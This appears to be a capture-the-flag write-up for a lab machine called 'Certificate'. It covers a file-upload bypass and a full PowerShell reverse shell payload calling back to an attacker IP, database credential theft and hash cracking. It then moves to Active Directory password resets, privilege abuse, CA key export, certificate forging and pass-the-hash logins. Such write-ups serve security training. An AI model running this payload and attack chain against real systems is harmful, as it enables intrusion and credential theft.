Certificate
Certificate
First of all we need to go to the website [Link] and register and login.
echo '[Link] [Link] [Link]' | sudo tee -a
/etc/hosts
If we run gobuster we can see there's a php file called [Link]
gobuster dir -u "[Link] -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-
[Link] -t 100 -x
1/9
� Certificate
If we go to the website it says this
So I fuzzed in burpsuite or you can even do it with wfuzz until I found valid s_id
[Link]
In this case I will go to the [Link]
Here we have a file upload functionality
Here I crafted my malicious .zip for getting a reverse.
echo "I love Astro" > [Link]
zip [Link] [Link]
mkdir malicious_files
cd malicious_files
nano [Link]
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object
[Link]('YOURIP',4444); \$stream =
\$[Link](); [byte[]]\$bytes = 0..65535|%{0}; while((\$i =
\$[Link](\$bytes, 0, \$[Link])) -ne 0){; \$data = (New-Object -
TypeName [Link]).GetString(\$bytes,0,\$i); \$sendback =
(iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' +
(pwd).Path + '> '; \$sendbyte =
2/9
� Certificate
([[Link]]::ASCII).GetBytes(\$sendback2);
\$[Link](\$sendbyte,0,\$[Link]); \$[Link]()};
\$[Link]()\"");
?>
cd ..
zip -r [Link] malicious_files/
cat [Link] [Link] > [Link]
Now upload the [Link]
For trigger the php execution it will generate a link so click it, in my case is
[Link]
Then we need to change the url like this
[Link]
[Link]
Before going we setup our listener nc -nlvp 4444
And we get a shell as xamppuser, here we need to go some directories back and read the
3/9
� Certificate
[Link]
I crafted this command for retrieve the users.
C:\xampp\mysql\bin\[Link] -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D
Certificate_WEBAPP_DB -e "SELECT * FROM users;"
This is the result.
Here we need to focus on Sara.B hash, save its hash into [Link]
And then crack it with hashcat, I used this command
hashcat -a 0 -m 3200 [Link] /usr/share/wordlists/[Link] -O
We get Sara.B and its password is Blink182.
First of all I runned bloodhound to see more about this AD.
bloodhound-python -u 'Sara.B' -p 'Blink182' -d [Link] -c All --zip -ns
[Link]
Once in the bloodhound if we search by Sara.B and we go down we can see Transitive
Object Control
4/9
� Certificate
Here we can see the following scheme, this scheme means that Sara.B is a member of
Account Operators.
5/9
� Certificate
If we go to Account Operators Group and go to Reachable High value Targets
In this scheme we can see that this group has GenericAll to [Link]
To abuse that we can simply run this command
net rpc password "[Link]" "newP@ssword2022" -U
"[Link]"/"Sara.B"%"Blink182" -S [Link]
Now we can login via winrm with this credentials and we are in. Flag is located in
C:\Users\[Link]\Desktop\[Link]
For root first we need to change Ryan.K password and login via winrm.
This is the command I used.
net rpc password "Ryan.K" "newP@ssword2022" -U
"[Link]"/"Sara.B"%"Blink182" -S [Link]
6/9
� Certificate
Once in the winrm session if the print the command whoami /priv
We can see that has SeManageVolumePrivilege for abuse that we can simply upload this
.exe
[Link]
Download the .exe and upload it
If we execute it we can see the following Output
Running this exploit means that Ryan.K now has Full Control over C:
Following this we can simply run the following commands.
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\[Link]
7/9
� Certificate
Now we can download this [Link] to our machine.
With this [Link] we can forge our [Link]
So I runned this command
certipy forge -ca-pfx [Link] \
-upn 'administrator@[Link]' \
-subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' \
-out forged_admin.pfx
Final step is abuse certipy auth for getting the Administrator hash.
certipy auth -pfx forged_admin.pfx \
-dc-ip [Link] \
-username 'administrator' \
-domain '[Link]'
8/9
� Certificate
Now we can login via evil-winrm or psexec I will show the two methods in case one fail.
evil-winrm -i [Link] -u administrator -
H'd803303515bf814ac14c5f1702abh866'
impacket-psexec 'Administrator@[Link]' -hashes
'aad3b435b51404eeaad3b435b51404ee:d803303515bf814ac14c5f1702abh866'
I changed the hashes :) So I make sure everyone does this machine.
9/9
